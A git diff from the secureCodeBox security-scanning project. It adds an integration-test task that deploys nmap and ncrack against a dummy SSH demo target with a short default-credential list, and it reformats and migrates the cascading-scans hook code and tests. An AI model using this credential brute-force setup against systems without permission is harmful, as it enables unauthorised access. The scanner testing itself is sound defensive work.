+tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: + - | + # install nmap + helm -n integration-tests upgrade --install nmap oci://ghcr.io/securecodebox/helm/nmap \ + --set="cascadingRules.enabled=true" + - | + # install ncrack + printf "root\nadmin\n" > users.txt + printf "THEPASSWORDYOUCREATED\n123456\npassword\n" > passwords.txt + kubectl create secret generic --from-file users.txt --from-file passwords.txt ncrack-lists -n integration-tests --dry-run=client -o yaml | kubectl apply -f - + + helm -n integration-tests upgrade --install ncrack oci://ghcr.io/securecodebox/helm/ncrack \ + --set="scanner.extraVolumes[0].name=ncrack-lists" \ + --set="scanner.extraVolumes[0].secret.secretName=ncrack-lists" \ + --set="scanner.extraVolumeMounts[0].name=ncrack-lists" \ + --set="scanner.extraVolumeMounts[0].mountPath=/ncrack/" \ + --set="cascadingRules.enabled=true" diff --git a/hooks/cascading-scans/hook/.dockerignore b/hooks/cascading-scans/hook/.dockerignore index 39bbc11c9b..b0988ef9f2 100644 --- a/hooks/cascading-scans/hook/.dockerignore +++ b/hooks/cascading-scans/hook/.dockerignore @@ -4,3 +4,4 @@ node_modules/ docs/ +build/ diff --git a/hooks/cascading-scans/hook/Dockerfile b/hooks/cascading-scans/hook/Dockerfile index 1d0c1776e2..a941c67eed 100644 --- a/hooks/cascading-scans/hook/Dockerfile +++ b/hooks/cascading-scans/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS install RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine AS build RUN mkdir -p /home/app @@ -20,5 +20,7 @@ RUN npm run build FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ +COPY --chown=root:root --chmod=755 package.json package-lock.json ./ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --from=build --chown=root:root --chmod=755 /home/app/hook.js /home/app/hook.js.map /home/app/scan-helpers.js /home/app/scan-helpers.js.map /home/app/scope-limiter.js /home/app/scope-limiter.js.map /home/app/kubernetes-label-selector.js /home/app/kubernetes-label-selector.js.map ./ +COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ + diff --git a/hooks/cascading-scans/hook/hook.test.js b/hooks/cascading-scans/hook/hook.test.js index 5d3ffea85e..66dbd6da95 100644 --- a/hooks/cascading-scans/hook/hook.test.js +++ b/hooks/cascading-scans/hook/hook.test.js @@ -2,11 +2,11 @@ // // SPDX-License-Identifier: Apache-2.0 -const {getCascadingScans} = require("./hook"); +const { getCascadingScans } = require("./hook"); const { LabelSelectorRequirementOperator, } = require("./kubernetes-label-selector"); -const {ScopeLimiterRequirementOperator} = require("./scope-limiter"); +const { ScopeLimiterRequirementOperator } = require("./scope-limiter"); let parentScan = undefined; let sslyzeCascadingRules = undefined; @@ -86,7 +86,7 @@ test("Should create subsequent scans for open HTTPS ports (NMAP findings)", () = findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -156,7 +156,7 @@ test("Should create no subsequent scans if there are no rules", () => { findings, cascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(`[]`); @@ -184,11 +184,11 @@ test("Should not try to do magic to the scan name if its something random", () = findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans[0].metadata.generateName).toEqual( - "foobar.com-tls-scans-" + "foobar.com-tls-scans-", ); }); @@ -214,7 +214,7 @@ test("Should not start a new scan when the corresponding cascadingRule is alread findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(`[]`); @@ -241,7 +241,7 @@ test("Should not crash when the annotations are not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -294,7 +294,7 @@ test("Should copy ENV fields from cascadingRule to created scan", () => { sslyzeCascadingRules[0].spec.scanSpec.env = [ { name: "FOOBAR", - valueFrom: {secretKeyRef: {name: "foobar-token", key: "token"}}, + valueFrom: { secretKeyRef: { name: "foobar-token", key: "token" } }, }, ]; @@ -316,7 +316,7 @@ test("Should copy ENV fields from cascadingRule to created scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans[0].spec.env).toMatchInlineSnapshot(` @@ -380,7 +380,7 @@ test("Should allow wildcards in cascadingRules", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -455,14 +455,14 @@ test("should not copy labels if inheritLabels is set to false", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(false); } }); @@ -492,14 +492,14 @@ test("should copy labels if inheritLabels is not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); } }); @@ -531,14 +531,14 @@ test("should copy labels if inheritLabels is set to true", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); } }); @@ -568,14 +568,14 @@ test("should not copy annotations if inheritAnnotations is set to false", () => findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(false); } }); @@ -604,14 +604,14 @@ test("should copy annotations if inheritAnnotations is not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); } }); @@ -641,14 +641,14 @@ test("should copy annotations if inheritAnnotations is set to true", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); } }); @@ -677,14 +677,14 @@ test("should copy scanLabels from CascadingRule to cascading scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; expect( Object.entries(sslyzeCascadingRules[0].spec.scanLabels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); }); @@ -712,14 +712,14 @@ test("should copy scanAnnotations from CascadingRule to cascading scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; expect( Object.entries(sslyzeCascadingRules[0].spec.scanAnnotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); }); @@ -764,7 +764,7 @@ test("should properly parse template values in scanLabels and scanAnnotations", findings, sslyzeCascadingRules, sslyzeCascadingRules[0], - parseDefinition + parseDefinition, ); expect(sslyzeCascadingRules[0].spec.scanSpec.parameters).toEqual([ @@ -772,7 +772,7 @@ test("should properly parse template values in scanLabels and scanAnnotations", "{{$.hostOrIP}}:{{attributes.port}}", ]); - const {labels, annotations} = cascadedScans[0].metadata; + const { labels, annotations } = cascadedScans[0].metadata; // No snapshots as scanLabels/scanAnnotations can be in any order const labelResults = { @@ -827,7 +827,7 @@ test("should copy proper finding ID into annotations", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -837,8 +837,8 @@ test("should copy proper finding ID into annotations", () => { if (label === "cascading.securecodebox.io/matched-finding") { return value === "f0c718bd-9987-42c8-2259-73794e61dd5a"; } else return true; - } - ) + }, + ), ).toBe(true); }); @@ -876,7 +876,7 @@ test("should merge environment variables into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -932,7 +932,7 @@ test("should merge volumeMounts into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -992,7 +992,7 @@ test("should merge volumes into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1051,7 +1051,7 @@ test("should merge initContainers into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1112,7 +1112,7 @@ test("should not merge initContainers into cascaded scan if not instructed", () findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1173,9 +1173,9 @@ test("Templating should apply to environment variables", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], - env: [{name: "HostOrIp", value: "{{$.hostOrIP}}"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], + env: [{ name: "HostOrIp", value: "{{$.hostOrIP}}" }], }, }, }, @@ -1186,7 +1186,7 @@ test("Templating should apply to environment variables", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1292,14 +1292,14 @@ test("Templating should apply to initContainer commands", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["ping", "-c", "1", "{{$.hostOrIP}}"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], }, ], }, @@ -1312,7 +1312,7 @@ test("Templating should apply to initContainer commands", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1430,15 +1430,15 @@ test("Templating should apply to initContainer environment variables", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["whoami"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], - env: [{name: "HostOrIp", value: "{{$.hostOrIP}}"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], + env: [{ name: "HostOrIp", value: "{{$.hostOrIP}}" }], }, ], }, @@ -1451,7 +1451,7 @@ test("Templating should apply to initContainer environment variables", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1572,14 +1572,14 @@ test("Templating should not break special encoding (http://...) when using tripl scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{{attributes.hostname}}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["ping", "-c", "1", "{{{attributes.hostname}}}"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], }, ], }, @@ -1592,7 +1592,7 @@ test("Templating should not break special encoding (http://...) when using tripl findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1713,7 +1713,7 @@ test("should merge hookSelector into cascaded scan if inheritHookSelector is ena findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1788,7 +1788,7 @@ test("should not merge hookSelector into cascaded scan if inheritHookSelector is findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1857,7 +1857,7 @@ test("should copy tolerations and affinity into cascaded scan if one is set and findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1944,7 +1944,7 @@ test("should not copy tolerations and affinity into cascaded scan if label disab findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2027,7 +2027,7 @@ test("should merge tolerations and replace affinity in cascaded scan if cascadin findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2096,7 +2096,7 @@ test("should not set affinity or tolerations to undefined if they are defined to findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2130,7 +2130,7 @@ test("Should not set affinity or tolerations to undefined if they are defined to findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2216,7 +2216,7 @@ test("should only use tolerations and affinity of cascaded scan if inheritance i findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2352,7 +2352,7 @@ test("should purge cascaded scan spec from parent scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2396,7 +2396,7 @@ test("should purge cascaded scan spec from parent scan", () => { findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; @@ -2445,7 +2445,7 @@ test("should purge cascaded scan spec from parent scan", () => { ] `); expect( - secondCascadedScan.spec.hookSelector.matchLabels + secondCascadedScan.spec.hookSelector.matchLabels, ).toMatchInlineSnapshot(`{}`); }); @@ -2518,7 +2518,7 @@ test("should not copy cascaded scan spec from parent scan if inheritance is unde findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2561,7 +2561,7 @@ test("should not copy cascaded scan spec from parent scan if inheritance is unde findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; @@ -2592,7 +2592,7 @@ test("should append cascading rule to further cascading scan chains", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2635,13 +2635,13 @@ test("should append cascading rule to further cascading scan chains", () => { findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; expect( - secondCascadedScan.metadata.annotations["cascading.securecodebox.io/chain"] + secondCascadedScan.metadata.annotations["cascading.securecodebox.io/chain"], ).toEqual("tls-scans,tls-scans-second"); }); @@ -2688,7 +2688,7 @@ test("should not cascade if scope limiter does not pass", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -2778,11 +2778,11 @@ test("scope annotations should be completely immutable", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toThrowError( - "may not add scope annotation 'scope.cascading.securecodebox.io/domains':'malicious.example.com' in Cascading Rule spec" + "may not add scope annotation 'scope.cascading.securecodebox.io/domains':'malicious.example.com' in Cascading Rule spec", ); delete sslyzeCascadingRules[0].spec.scanAnnotations[ diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index 4779bbd75b..f701bdc698 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -11,9 +11,9 @@ import { pickBy, forEach, isArray, -} from "lodash"; -import {isMatch as wildcardIsMatch} from "matcher"; -import * as Mustache from "mustache"; +} from "lodash-es"; +import { isMatch as wildcardIsMatch } from "matcher"; +import Mustache from "mustache/mustache.mjs"; import { startSubsequentSecureCodeBoxScan, @@ -29,15 +29,15 @@ import { mergeInheritedMap, mergeInheritedArray, mergeInheritedSelector, -} from "./scan-helpers"; -import {isInScope, scopeDomain} from "./scope-limiter"; +} from "./scan-helpers.js"; +import { isInScope, scopeDomain } from "./scope-limiter.js"; interface HandleArgs { scan: Scan; getFindings: () => Array; } -export async function handle({scan, getFindings}: HandleArgs) { +export async function handle({ scan, getFindings }: HandleArgs) { const findings = await getFindings(); const cascadingRules = await getCascadingRules(scan); const cascadedRuleUsedForParentScan = await getCascadedRuleForScan(scan); @@ -48,7 +48,7 @@ export async function handle({scan, getFindings}: HandleArgs) { findings, cascadingRules, cascadedRuleUsedForParentScan, - parseDefinition + parseDefinition, ); for (const cascadingScan of cascadingScans) { @@ -75,14 +75,14 @@ export function getCascadingScans( findings: Array, cascadingRules: Array, cascadedRuleUsedForParentScan: CascadingRule, - parseDefinition: ParseDefinition + parseDefinition: ParseDefinition, ): Array { let cascadingScans: Array = []; const cascadingRuleChain = getScanChain(parentScan); parentScan = purgeCascadedRuleFromScan( parentScan, - cascadedRuleUsedForParentScan + cascadedRuleUsedForParentScan, ); for (const cascadingRule of cascadingRules) { @@ -90,7 +90,7 @@ export function getCascadingScans( // If it has already been used skip this rule as it could potentially lead to loops if (cascadingRuleChain.includes(cascadingRule.metadata.name)) { console.log( - `Skipping Rule "${cascadingRule.metadata.name}" as it was already applied in this chain.` + `Skipping Rule "${cascadingRule.metadata.name}" as it was already applied in this chain.`, ); continue; } @@ -99,13 +99,18 @@ export function getCascadingScans( forEach(cascadingRule.spec.scanAnnotations, (value, key) => { if (key.startsWith(scopeDomain)) { throw new Error( - `may not add scope annotation '${key}':'${value}' in Cascading Rule spec` + `may not add scope annotation '${key}':'${value}' in Cascading Rule spec`, ); } }); cascadingScans = cascadingScans.concat( - getScansMatchingRule(parentScan, findings, cascadingRule, parseDefinition) + getScansMatchingRule( + parentScan, + findings, + cascadingRule, + parseDefinition, + ), ); } @@ -129,7 +134,7 @@ function getScansMatchingRule( parentScan: Scan, findings: Array, cascadingRule: CascadingRule, - parseDefinition: ParseDefinition + parseDefinition: ParseDefinition, ) { const cascadingScans: Array = []; for (const finding of findings) { @@ -138,23 +143,23 @@ function getScansMatchingRule( parentScan.spec.cascades.scopeLimiter, parentScan.metadata.annotations, finding, - parseDefinition.spec.scopeLimiterAliases + parseDefinition.spec.scopeLimiterAliases, ); if (!inScope) { console.log( - `Cascading Rule ${cascadingRule.metadata.name} not triggered as scope limiter did not pass` + `Cascading Rule ${cascadingRule.metadata.name} not triggered as scope limiter did not pass`, ); console.log( - `Scan annotations ${JSON.stringify(parentScan.metadata.annotations)}` + `Scan annotations ${JSON.stringify(parentScan.metadata.annotations)}`, ); console.log( - `Scope limiter ${JSON.stringify(parentScan.spec.cascades.scopeLimiter)}` + `Scope limiter ${JSON.stringify(parentScan.spec.cascades.scopeLimiter)}`, ); console.log( `Scope limiter aliases ${JSON.stringify( - parseDefinition.spec.scopeLimiterAliases - )}` + parseDefinition.spec.scopeLimiterAliases, + )}`, ); console.log(`Finding ${JSON.stringify(finding)}`); continue; @@ -164,7 +169,7 @@ function getScansMatchingRule( const matches = cascadingRule.spec.matches.anyOf.some( (matchesRule) => isMatch(finding, matchesRule) || - isMatchWith(finding, matchesRule, wildcardMatcher) + isMatchWith(finding, matchesRule, wildcardMatcher), ); if (matches) { @@ -177,16 +182,16 @@ function getScansMatchingRule( function getCascadingScan( parentScan: Scan, finding: Finding, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ) { // Make a deep copy of the original cascading rule so that we can template it again with different findings. cascadingRule = templateCascadingRule( parentScan, finding, - cloneDeep(cascadingRule) + cloneDeep(cascadingRule), ); - let {scanType, parameters} = cascadingRule.spec.scanSpec; + let { scanType, parameters } = cascadingRule.spec.scanSpec; let { annotations, @@ -218,7 +223,7 @@ function getCascadingScan( cascadingRule.metadata.name, ].join(","), ...pickBy(parentScan.metadata.annotations, (value, key) => - key.startsWith(scopeDomain) + key.startsWith(scopeDomain), ), }, ownerReferences: [ @@ -249,7 +254,7 @@ function getCascadingScan( } function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { - const {scanAnnotations, scanLabels} = cascadingRule.spec; + const { scanAnnotations, scanLabels } = cascadingRule.spec; let { env = [], volumes = [], @@ -280,7 +285,7 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { selectedTolerations = mergeInheritedArray( scan.spec.tolerations, tolerations, - inheritTolerations + inheritTolerations, ); } else if (inheritTolerations) { selectedTolerations = scan.spec.tolerations; @@ -297,7 +302,7 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { annotations: mergeInheritedMap( scan.metadata.annotations, scanAnnotations, - inheritAnnotations + inheritAnnotations, ), labels: mergeInheritedMap(scan.metadata.labels, scanLabels, inheritLabels), env: mergeInheritedArray(scan.spec.env, env, inheritEnv), @@ -305,17 +310,17 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { volumeMounts: mergeInheritedArray( scan.spec.volumeMounts, volumeMounts, - inheritVolumes + inheritVolumes, ), initContainers: mergeInheritedArray( scan.spec.initContainers, initContainers, - inheritInitContainers + inheritInitContainers, ), hookSelector: mergeInheritedSelector( scan.spec.hookSelector, hookSelector, - inheritHookSelector + inheritHookSelector, ), affinity: selectedAffinity, tolerations: selectedTolerations, @@ -339,7 +344,7 @@ function hostOrIP(finding: Finding): string { function templateCascadingRule( parentScan: Scan, finding: Finding, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ): CascadingRule { const templateArgs = { ...finding, @@ -350,17 +355,17 @@ function templateCascadingRule( }, }; - const {scanSpec, scanAnnotations, scanLabels} = cascadingRule.spec; - const {scanType, parameters, initContainers} = scanSpec; + const { scanSpec, scanAnnotations, scanLabels } = cascadingRule.spec; + const { scanType, parameters, initContainers } = scanSpec; // Templating for scanType cascadingRule.spec.scanSpec.scanType = Mustache.render( scanType, - templateArgs + templateArgs, ); // Templating for scan parameters cascadingRule.spec.scanSpec.parameters = parameters.map((parameter) => - Mustache.render(parameter, templateArgs) + Mustache.render(parameter, templateArgs), ); // Templating for environmental variables if (cascadingRule.spec.scanSpec.env !== undefined) { @@ -379,7 +384,7 @@ function templateCascadingRule( cascadingRule.spec.scanSpec.initContainers.forEach((container) => { // Templating for the command container.command = container.command.map((parameter) => - Mustache.render(parameter, templateArgs) + Mustache.render(parameter, templateArgs), ); // Templating for env variables, similar to above. if (container.env !== undefined) { @@ -396,7 +401,7 @@ function templateCascadingRule( scanAnnotations === undefined ? {} : mapValues(scanAnnotations, (value) => - Mustache.render(value, templateArgs) + Mustache.render(value, templateArgs), ); // Templating for scan labels cascadingRule.spec.scanLabels = @@ -409,7 +414,7 @@ function templateCascadingRule( function generateCascadingScanName( parentScan: Scan, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ): string { let namePrefix = parentScan.metadata.name; @@ -418,7 +423,7 @@ function generateCascadingScanName( if (namePrefix.startsWith(parentScan.spec.scanType)) { namePrefix = namePrefix.replace( parentScan.spec.scanType, - cascadingRule.spec.scanSpec.scanType + cascadingRule.spec.scanSpec.scanType, ); } return `${namePrefix}-${cascadingRule.metadata.name}`; @@ -430,7 +435,7 @@ function wildcardMatcher(findingValue: any, matchesRuleValue: any): boolean { return wildcardIsMatch( findingValue.toString(), matchesRuleValue.toString(), - {caseSensitive: true} + { caseSensitive: true }, ); // return new RegExp('^' + new String(matchesRuleValue).replace(/\*/g, '.*') + '$').test(findingValue); } catch (error) { diff --git a/hooks/cascading-scans/hook/kubernetes-label-selector.test.js b/hooks/cascading-scans/hook/kubernetes-label-selector.test.js index 2ec0c27279..96ffb92beb 100644 --- a/hooks/cascading-scans/hook/kubernetes-label-selector.test.js +++ b/hooks/cascading-scans/hook/kubernetes-label-selector.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {generateSelectorString} = require("./kubernetes-label-selector"); +const { generateSelectorString } = require("./kubernetes-label-selector"); test("should generate a empty string if passed an empty object", () => { expect(generateSelectorString({})).toBe(""); @@ -11,14 +11,14 @@ test("should generate a empty string if passed an empty object", () => { test("should generate basic label string for key values selector", () => { expect( generateSelectorString({ - matchLabels: {environment: "production"}, - }) + matchLabels: { environment: "production" }, + }), ).toBe("environment=production"); expect( generateSelectorString({ - matchLabels: {environment: "testing"}, - }) + matchLabels: { environment: "testing" }, + }), ).toBe("environment=testing"); }); @@ -29,7 +29,7 @@ test("should generate basic label string for multiple key values selector", () = environment: "production", team: "search", }, - }) + }), ).toBe("environment=production,team=search"); expect( @@ -38,7 +38,7 @@ test("should generate basic label string for multiple key values selector", () = environment: "testing", team: "payment", }, - }) + }), ).toBe("environment=testing,team=payment"); }); @@ -52,7 +52,7 @@ test("should generate label string for set based expressions", () => { values: ["testing", "development"], }, ], - }) + }), ).toBe("environment in (testing,development)"); expect( @@ -64,7 +64,7 @@ test("should generate label string for set based expressions", () => { values: ["development"], }, ], - }) + }), ).toBe("environment in (development)"); }); @@ -83,7 +83,7 @@ test("should generate label string for set based expressions with multiple entri values: ["search", "payment"], }, ], - }) + }), ).toBe("environment notin (production),team in (search,payment)"); }); @@ -100,7 +100,7 @@ test("should generate label string for set based Exists and DoesNotExist operato operator: "DoesNotExist", }, ], - }) + }), ).toBe("environment,!team"); }); @@ -130,9 +130,9 @@ test("should generate selectors with both expression and labelMatching", () => { matchLabels: { critical: "true", }, - }) + }), ).toBe( - "critical=true,environment notin (production),team in (search,payment),foobar,!barfoo" + "critical=true,environment notin (production),team in (search,payment),foobar,!barfoo", ); }); @@ -146,8 +146,8 @@ test("should throw a exception when passed a unknown operator", () => { values: ["production"], }, ], - }) + }), ).toThrowErrorMatchingInlineSnapshot( - `"Unknown LabelSelector Operator "FooBar". Supported are (In, NotIn, Exists, DoesNotExist). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo."` + `"Unknown LabelSelector Operator "FooBar". Supported are (In, NotIn, Exists, DoesNotExist). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo."`, ); }); diff --git a/hooks/cascading-scans/hook/kubernetes-label-selector.ts b/hooks/cascading-scans/hook/kubernetes-label-selector.ts index 19e6a9441a..861efcf69d 100644 --- a/hooks/cascading-scans/hook/kubernetes-label-selector.ts +++ b/hooks/cascading-scans/hook/kubernetes-label-selector.ts @@ -29,11 +29,11 @@ export function generateSelectorString({ matchLabels = new Map(), }: LabelSelector): string { const matchLabelsSelector = Array.from(Object.entries(matchLabels)).map( - generateLabelsSelectorString + generateLabelsSelectorString, ); const matchExpressionsSelector = matchExpressions.map( - generateExpressionsSelectorString + generateExpressionsSelectorString, ); return [...matchLabelsSelector, ...matchExpressionsSelector].join(","); @@ -61,11 +61,11 @@ function generateExpressionsSelectorString({ default: const supportedOperators = Object.values( - LabelSelectorRequirementOperator + LabelSelectorRequirementOperator, ).join(", "); throw new Error( - `Unknown LabelSelector Operator "${operator}". Supported are (${supportedOperators}). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo.` + `Unknown LabelSelector Operator "${operator}". Supported are (${supportedOperators}). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo.`, ); } } diff --git a/hooks/cascading-scans/hook/package-lock.json b/hooks/cascading-scans/hook/package-lock.json index 6e03dc9635..07e2def7e5 100644 --- a/hooks/cascading-scans/hook/package-lock.json +++ b/hooks/cascading-scans/hook/package-lock.json @@ -1,7 +1,7 @@ { "name": "@securecodebox/hook-cascading-scans", "version": "1.0.0", - "lockfileVersion": 2, + "lockfileVersion": 3, "requires": true, "packages": { "": { @@ -9,8001 +9,1467 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "ip-address": "^8.1.0", - "lodash": "^4.17.21", - "matcher": "^4.0.0", + "@kubernetes/client-node": "^1.3.0", + "ip-address": "^10.0.1", + "lodash-es": "^4.17.21", + "matcher": "^5.0.0", "mustache": "^4.2.0", - "parse-domain": "^4.1.0" + "parse-domain": "^8.2.2" }, "devDependencies": { "@types/ip-address": "^7.0.0", - "@types/jest": "^29.4.0", "@types/lodash": "^4.14.171", - "@types/node": "^16.0.0", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", - "typescript": "^4.3.5" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": 